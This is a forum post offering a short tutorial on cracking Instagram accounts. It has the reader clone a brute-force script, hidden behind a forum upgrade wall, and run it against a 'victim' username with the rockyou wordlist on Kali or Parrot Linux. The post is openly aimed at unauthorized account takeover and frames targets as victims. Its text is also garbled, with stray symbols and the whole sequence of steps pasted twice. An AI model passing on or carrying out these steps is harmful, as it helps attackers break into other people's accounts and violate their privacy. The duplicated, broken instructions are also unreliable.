SEO Ninja
300 XP
Hey y'all this is a quick snappy tutorial on how to crack the majority of instagram accounts using a bruteforce method. If you have any questions or anything, send a PM and I'll reply ASAP
So the first thing you need is Kali Linux or Parrot Sec os or any other linux OS ?you can download parrot os from here https://parrotsec.org and kali linux from here kali.org
1 Open Terminal? and copy paste the stuff below in order
2 apt update && apt ugrade -y
3 apt-get install git
4 apt-get install python?{installing python }
?5 apt-get install python3?{installing python3}?
{installing git to clone repo}?4 apt-get install python?{installing python }?5 apt-get install python3?{installing python3}?6 cd Desktop?
6 cd Desktop?{
changing directory to desktop
7 git clone
{This command will clone the github repo}?OK so after completion of 7th command we need to run
?8 chmod +x Instagram?after that run?cd Instagram?Now run python instagram.py -h to get the help menu?.
9 Now just simply enter this command?python/2/3 instagram.py USERNAME OF VICTIM /Path_of_wordlist_file?[wordlist file comes already by default in linux or parrot just extract rockyou in /usr/share/wordlists and replace the path ]?
*If the users password is in rockyou than this gonna work but if not than its your bad luck but you can try other ways if you *want?
So the first thing you need is Kali Linux or Parrot Sec os or any other linux OS ?you can download parrot os from here https://parrotsec.org and kali linux from here kali.org
1 Open Terminal? and copy paste the stuff below in order
2 apt update && apt ugrade -y
3 apt-get install git
4 apt-get install python?{installing python }
?5 apt-get install python3?{installing python3}?
{installing git to clone repo}?4 apt-get install python?{installing python }?5 apt-get install python3?{installing python3}?6 cd Desktop?
6 cd Desktop?{
changing directory to desktop
7 git clone
You must upgrade your account or reply in the thread to view hidden text.
?8 chmod +x Instagram?after that run?cd Instagram?Now run python instagram.py -h to get the help menu?.
9 Now just simply enter this command?python/2/3 instagram.py USERNAME OF VICTIM /Path_of_wordlist_file?[wordlist file comes already by default in linux or parrot just extract rockyou in /usr/share/wordlists and replace the path ]?
*If the users password is in rockyou than this gonna work but if not than its your bad luck but you can try other ways if you *want?